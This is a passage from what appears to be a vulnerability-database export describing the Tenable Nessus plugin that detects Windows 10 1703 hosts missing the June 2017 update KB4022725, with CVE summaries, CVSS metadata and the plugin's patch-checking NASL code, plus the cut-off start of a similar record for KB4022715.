of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run processes in\n an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge\n in the Content Security Policy (CSP) due to improper\n validation of documents. An unauthenticated, remote\n attacker can exploit this, by convincing a user to\n follow a link, to cause the user to load a malicious\n website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)", "edition": 42, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022725.NASL", "href": "https://www.tenable.com/plugins/nessus/100763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100763);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8498\",\n \"CVE-2017-8499\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8520\",\n \"CVE-2017-8521\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8555\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98845,\n 98847,\n 98848,\n 98849,\n 98850,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98883,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98920,\n 98922,\n 98923,\n 98925,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 98956,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022725\");\n script_xref(name:\"MSFT\", value:\"MS17-4022725\");\n\n script_name(english:\"KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run processes in\n an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge\n in the Content Security Policy (CSP) due to improper\n validation of documents. An unauthenticated, remote\n attacker can exploit this, by convincing a user to\n follow a link, to cause the user to load a malicious\n website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022725/windows-10-update-kb4022725\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c538cc09\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022725 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022725' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022725))\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:54", "description": "The remote Windows host is missing security update KB4022715. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0173,\n CVE-2017-0215, CVE-2017-0216, CVE-2017-0218,\n CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote 